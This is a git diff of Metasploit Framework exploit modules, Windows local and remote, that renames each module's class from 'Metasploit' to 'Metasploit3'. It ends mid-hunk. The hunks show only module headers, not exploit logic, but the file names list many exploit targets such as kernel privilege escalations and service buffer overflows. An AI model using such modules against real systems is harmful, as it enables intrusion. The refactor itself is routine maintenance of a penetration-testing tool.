a/modules/exploits/windows/local/ms10_092_schelevator.rb +++ b/modules/exploits/windows/local/ms10_092_schelevator.rb @@ -8,7 +8,7 @@ require 'rex' require 'zlib' require 'msf/core/exploit/exe' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb index ecce4f31f9..662481af63 100644 --- a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb +++ b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking # Average because this module relies on memory corruption within the # kernel, this is inherently dangerous. Also if the payload casues diff --git a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb index 8e1dc1f601..8729306125 100644 --- a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb +++ b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb @@ -9,7 +9,7 @@ require 'msf/core/exploit/exe' require 'msf/core/exploit/powershell' require 'msf/core/post/file' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/windows/local/ms13_053_schlamperei.rb b/modules/exploits/windows/local/ms13_053_schlamperei.rb index e8a7632b55..8d647f7a8d 100644 --- a/modules/exploits/windows/local/ms13_053_schlamperei.rb +++ b/modules/exploits/windows/local/ms13_053_schlamperei.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/ms13_081_track_popup_menu.rb b/modules/exploits/windows/local/ms13_081_track_popup_menu.rb index 7c8ec7dda7..7095e49f9e 100644 --- a/modules/exploits/windows/local/ms13_081_track_popup_menu.rb +++ b/modules/exploits/windows/local/ms13_081_track_popup_menu.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb index 88f101ea74..de49e4a47d 100644 --- a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb +++ b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/exe' require 'msf/core/exploit/powershell' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb index 383cd92f4b..a4d5236714 100644 --- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/exe' require 'msf/core/exploit/powershell' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/windows/local/ms14_058_track_popup_menu.rb b/modules/exploits/windows/local/ms14_058_track_popup_menu.rb index 300eb77b76..2908ef555f 100644 --- a/modules/exploits/windows/local/ms14_058_track_popup_menu.rb +++ b/modules/exploits/windows/local/ms14_058_track_popup_menu.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb b/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb index 980c4803b9..d1430d6bab 100644 --- a/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb +++ b/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel diff --git a/modules/exploits/windows/local/ms15_004_tswbproxy.rb b/modules/exploits/windows/local/ms15_004_tswbproxy.rb index 34736ba5e0..a8cf36d104 100644 --- a/modules/exploits/windows/local/ms15_004_tswbproxy.rb +++ b/modules/exploits/windows/local/ms15_004_tswbproxy.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = GoodRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/ms15_051_client_copy_image.rb b/modules/exploits/windows/local/ms15_051_client_copy_image.rb index 8967f171ac..afa42a0dcd 100644 --- a/modules/exploits/windows/local/ms15_051_client_copy_image.rb +++ b/modules/exploits/windows/local/ms15_051_client_copy_image.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/ms15_078_atmfd_bof.rb b/modules/exploits/windows/local/ms15_078_atmfd_bof.rb index 6843f84fe6..e78ff63d46 100644 --- a/modules/exploits/windows/local/ms15_078_atmfd_bof.rb +++ b/modules/exploits/windows/local/ms15_078_atmfd_bof.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = ManualRanking WIN32K_VERSIONS = [ diff --git a/modules/exploits/windows/local/ms_ndproxy.rb b/modules/exploits/windows/local/ms_ndproxy.rb index 63bcaea64b..dfa59f4b35 100644 --- a/modules/exploits/windows/local/ms_ndproxy.rb +++ b/modules/exploits/windows/local/ms_ndproxy.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel diff --git a/modules/exploits/windows/local/novell_client_nicm.rb b/modules/exploits/windows/local/novell_client_nicm.rb index 5a6a8beed5..97b5f6d5b6 100644 --- a/modules/exploits/windows/local/novell_client_nicm.rb +++ b/modules/exploits/windows/local/novell_client_nicm.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::Windows::Priv diff --git a/modules/exploits/windows/local/novell_client_nwfs.rb b/modules/exploits/windows/local/novell_client_nwfs.rb index 38035a4073..e68b7eb646 100644 --- a/modules/exploits/windows/local/novell_client_nwfs.rb +++ b/modules/exploits/windows/local/novell_client_nwfs.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::Windows::Priv diff --git a/modules/exploits/windows/local/ntapphelpcachecontrol.rb b/modules/exploits/windows/local/ntapphelpcachecontrol.rb index 9dfecd1036..a0269a72b3 100644 --- a/modules/exploits/windows/local/ntapphelpcachecontrol.rb +++ b/modules/exploits/windows/local/ntapphelpcachecontrol.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = NormalRanking include Exploit::EXE diff --git a/modules/exploits/windows/local/nvidia_nvsvc.rb b/modules/exploits/windows/local/nvidia_nvsvc.rb index 1ac1f44fab..eaab094978 100644 --- a/modules/exploits/windows/local/nvidia_nvsvc.rb +++ b/modules/exploits/windows/local/nvidia_nvsvc.rb @@ -11,7 +11,7 @@ require 'msf/core/post/windows/process' require 'msf/core/post/windows/reflective_dll_injection' require 'msf/core/post/windows/services' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb index 94a2bfbdf7..8648ea1dac 100644 --- a/modules/exploits/windows/local/payload_inject.rb +++ b/modules/exploits/windows/local/payload_inject.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/exe' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::Windows::Process diff --git a/modules/exploits/windows/local/powershell_cmd_upgrade.rb b/modules/exploits/windows/local/powershell_cmd_upgrade.rb index 9f74a01df9..8a8b4bc1bc 100644 --- a/modules/exploits/windows/local/powershell_cmd_upgrade.rb +++ b/modules/exploits/windows/local/powershell_cmd_upgrade.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::Powershell diff --git a/modules/exploits/windows/local/powershell_remoting.rb b/modules/exploits/windows/local/powershell_remoting.rb index 9fe3a0a723..30ad2442b7 100644 --- a/modules/exploits/windows/local/powershell_remoting.rb +++ b/modules/exploits/windows/local/powershell_remoting.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/windows/local/ppr_flatten_rec.rb b/modules/exploits/windows/local/ppr_flatten_rec.rb index 8ac955619f..9bf0d99c53 100644 --- a/modules/exploits/windows/local/ppr_flatten_rec.rb +++ b/modules/exploits/windows/local/ppr_flatten_rec.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/pxeexploit.rb b/modules/exploits/windows/local/pxeexploit.rb index 89e3dfef9f..5830e98536 100644 --- a/modules/exploits/windows/local/pxeexploit.rb +++ b/modules/exploits/windows/local/pxeexploit.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/tftp' require 'rex/proto/dhcp' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::TFTPServer diff --git a/modules/exploits/windows/local/run_as.rb b/modules/exploits/windows/local/run_as.rb index fd986bcae4..122e0262f3 100644 --- a/modules/exploits/windows/local/run_as.rb +++ b/modules/exploits/windows/local/run_as.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local include Msf::Post::Windows::Runas include Msf::Post::Windows::Priv diff --git a/modules/exploits/windows/local/s4u_persistence.rb b/modules/exploits/windows/local/s4u_persistence.rb index 6852df112e..40a4dc77e1 100644 --- a/modules/exploits/windows/local/s4u_persistence.rb +++ b/modules/exploits/windows/local/s4u_persistence.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/exe' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/service_permissions.rb b/modules/exploits/windows/local/service_permissions.rb index 3042a02e4b..5f182feb70 100644 --- a/modules/exploits/windows/local/service_permissions.rb +++ b/modules/exploits/windows/local/service_permissions.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = GreatRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/trusted_service_path.rb b/modules/exploits/windows/local/trusted_service_path.rb index e001cbca2e..dcea5907f9 100644 --- a/modules/exploits/windows/local/trusted_service_path.rb +++ b/modules/exploits/windows/local/trusted_service_path.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/exe' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/windows/local/virtual_box_guest_additions.rb b/modules/exploits/windows/local/virtual_box_guest_additions.rb index d3e2331f47..fc78d7e63f 100644 --- a/modules/exploits/windows/local/virtual_box_guest_additions.rb +++ b/modules/exploits/windows/local/virtual_box_guest_additions.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel diff --git a/modules/exploits/windows/local/virtual_box_opengl_escape.rb b/modules/exploits/windows/local/virtual_box_opengl_escape.rb index 88d6c04db9..22a5db2c6e 100644 --- a/modules/exploits/windows/local/virtual_box_opengl_escape.rb +++ b/modules/exploits/windows/local/virtual_box_opengl_escape.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking DEVICE = '\\\\.\\VBoxGuest' diff --git a/modules/exploits/windows/local/vss_persistence.rb b/modules/exploits/windows/local/vss_persistence.rb index 4975125a57..f02c1e5a6c 100644 --- a/modules/exploits/windows/local/vss_persistence.rb +++ b/modules/exploits/windows/local/vss_persistence.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/exe' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/wmi.rb b/modules/exploits/windows/local/wmi.rb index 00554e574a..3f6a75d772 100644 --- a/modules/exploits/windows/local/wmi.rb +++ b/modules/exploits/windows/local/wmi.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' require 'rex' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/windows/lotus/domino_http_accept_language.rb b/modules/exploits/windows/lotus/domino_http_accept_language.rb index 021453b920..c806bb71d6 100644 --- a/modules/exploits/windows/lotus/domino_http_accept_language.rb +++ b/modules/exploits/windows/lotus/domino_http_accept_language.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/lotus/domino_icalendar_organizer.rb b/modules/exploits/windows/lotus/domino_icalendar_organizer.rb index 03d737edae..f5876e4d5e 100644 --- a/modules/exploits/windows/lotus/domino_icalendar_organizer.rb +++ b/modules/exploits/windows/lotus/domino_icalendar_organizer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/lotus/domino_sametime_stmux.rb b/modules/exploits/windows/lotus/domino_sametime_stmux.rb index 8ed85b1d08..f86f06cf09 100644 --- a/modules/exploits/windows/lotus/domino_sametime_stmux.rb +++ b/modules/exploits/windows/lotus/domino_sametime_stmux.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/lotus/lotusnotes_lzh.rb b/modules/exploits/windows/lotus/lotusnotes_lzh.rb index ba19e4ee1f..95cc18d40f 100644 --- a/modules/exploits/windows/lotus/lotusnotes_lzh.rb +++ b/modules/exploits/windows/lotus/lotusnotes_lzh.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking # needs client interaction and permanent listener # diff --git a/modules/exploits/windows/lpd/hummingbird_exceed.rb b/modules/exploits/windows/lpd/hummingbird_exceed.rb index 3ed39d24fd..2696dfd9cf 100644 --- a/modules/exploits/windows/lpd/hummingbird_exceed.rb +++ b/modules/exploits/windows/lpd/hummingbird_exceed.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/lpd/niprint.rb b/modules/exploits/windows/lpd/niprint.rb index 7acb9995b0..56f7267fc3 100644 --- a/modules/exploits/windows/lpd/niprint.rb +++ b/modules/exploits/windows/lpd/niprint.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/lpd/saplpd.rb b/modules/exploits/windows/lpd/saplpd.rb index 23c472fd50..c41eccb25d 100644 --- a/modules/exploits/windows/lpd/saplpd.rb +++ b/modules/exploits/windows/lpd/saplpd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/lpd/wincomlpd_admin.rb b/modules/exploits/windows/lpd/wincomlpd_admin.rb index bd32f64c51..ee2d364df6 100644 --- a/modules/exploits/windows/lpd/wincomlpd_admin.rb +++ b/modules/exploits/windows/lpd/wincomlpd_admin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/achat_bof.rb b/modules/exploits/windows/misc/achat_bof.rb index bdfc68fa7e..7a53dee238 100644 --- a/modules/exploits/windows/misc/achat_bof.rb +++ b/modules/exploits/windows/misc/achat_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/actfax_raw_server_bof.rb b/modules/exploits/windows/misc/actfax_raw_server_bof.rb index eaf73a37a0..2cf6fd756e 100644 --- a/modules/exploits/windows/misc/actfax_raw_server_bof.rb +++ b/modules/exploits/windows/misc/actfax_raw_server_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking diff --git a/modules/exploits/windows/misc/agentxpp_receive_agentx.rb b/modules/exploits/windows/misc/agentxpp_receive_agentx.rb index 44f4c7bf6b..8fcdb9e6d8 100644 --- a/modules/exploits/windows/misc/agentxpp_receive_agentx.rb +++ b/modules/exploits/windows/misc/agentxpp_receive_agentx.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/allmediaserver_bof.rb b/modules/exploits/windows/misc/allmediaserver_bof.rb index ccb860c254..0d02343531 100644 --- a/modules/exploits/windows/misc/allmediaserver_bof.rb +++ b/modules/exploits/windows/misc/allmediaserver_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/altiris_ds_sqli.rb b/modules/exploits/windows/misc/altiris_ds_sqli.rb index 18067fc7ef..383d1e5503 100644 --- a/modules/exploits/windows/misc/altiris_ds_sqli.rb +++ b/modules/exploits/windows/misc/altiris_ds_sqli.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb b/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb index 599b5f9652..dfa2e33ca2 100644 --- a/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb +++ b/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb b/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb index d83fbc79ca..5f4aaf27a6 100644 --- a/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb +++ b/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb b/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb index febdbb7b17..70c5c32675 100644 --- a/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb +++ b/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/avidphoneticindexer.rb b/modules/exploits/windows/misc/avidphoneticindexer.rb index 6985910e66..d61bc8c168 100644 --- a/modules/exploits/windows/misc/avidphoneticindexer.rb +++ b/modules/exploits/windows/misc/avidphoneticindexer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bakbone_netvault_heap.rb b/modules/exploits/windows/misc/bakbone_netvault_heap.rb index 561601a01d..f7ef75924e 100644 --- a/modules/exploits/windows/misc/bakbone_netvault_heap.rb +++ b/modules/exploits/windows/misc/bakbone_netvault_heap.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bcaaa_bof.rb b/modules/exploits/windows/misc/bcaaa_bof.rb index d2a9146071..6647a2e608 100644 --- a/modules/exploits/windows/misc/bcaaa_bof.rb +++ b/modules/exploits/windows/misc/bcaaa_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bigant_server.rb b/modules/exploits/windows/misc/bigant_server.rb index f4296efbac..a63b9bd4fa 100644 --- a/modules/exploits/windows/misc/bigant_server.rb +++ b/modules/exploits/windows/misc/bigant_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bigant_server_250.rb b/modules/exploits/windows/misc/bigant_server_250.rb index 96cfc7d23f..49e364a014 100644 --- a/modules/exploits/windows/misc/bigant_server_250.rb +++ b/modules/exploits/windows/misc/bigant_server_250.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb index af3cdb3ed9..e20af52a2a 100644 --- a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb +++ b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb b/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb index e5bdfdb403..4bf8ff8fcf 100644 --- a/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb +++ b/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bigant_server_usv.rb b/modules/exploits/windows/misc/bigant_server_usv.rb index b8af59e277..9db3b25a2f 100644 --- a/modules/exploits/windows/misc/bigant_server_usv.rb +++ b/modules/exploits/windows/misc/bigant_server_usv.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bomberclone_overflow.rb b/modules/exploits/windows/misc/bomberclone_overflow.rb index 2990317712..1bc230ad4c 100644 --- a/modules/exploits/windows/misc/bomberclone_overflow.rb +++ b/modules/exploits/windows/misc/bomberclone_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/bopup_comm.rb b/modules/exploits/windows/misc/bopup_comm.rb index 2a4a839ebd..2f5d35ae39 100644 --- a/modules/exploits/windows/misc/bopup_comm.rb +++ b/modules/exploits/windows/misc/bopup_comm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/borland_interbase.rb b/modules/exploits/windows/misc/borland_interbase.rb index 53e52a5860..0da0bbad83 100644 --- a/modules/exploits/windows/misc/borland_interbase.rb +++ b/modules/exploits/windows/misc/borland_interbase.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/borland_starteam.rb b/modules/exploits/windows/misc/borland_starteam.rb index ba586ef09a..e354c56925 100644 --- a/modules/exploits/windows/misc/borland_starteam.rb +++ b/modules/exploits/windows/misc/borland_starteam.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/misc/citrix_streamprocess.rb b/modules/exploits/windows/misc/citrix_streamprocess.rb index 2452027779..4ddb6beb1f 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb index 19429dc1d7..f64248b583 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb index a2dad45beb..31ed2b4605 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb index 8c3b562bb9..66d3145b80 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb index 0b1bc3af0e..2d36e4ee08 100644 --- 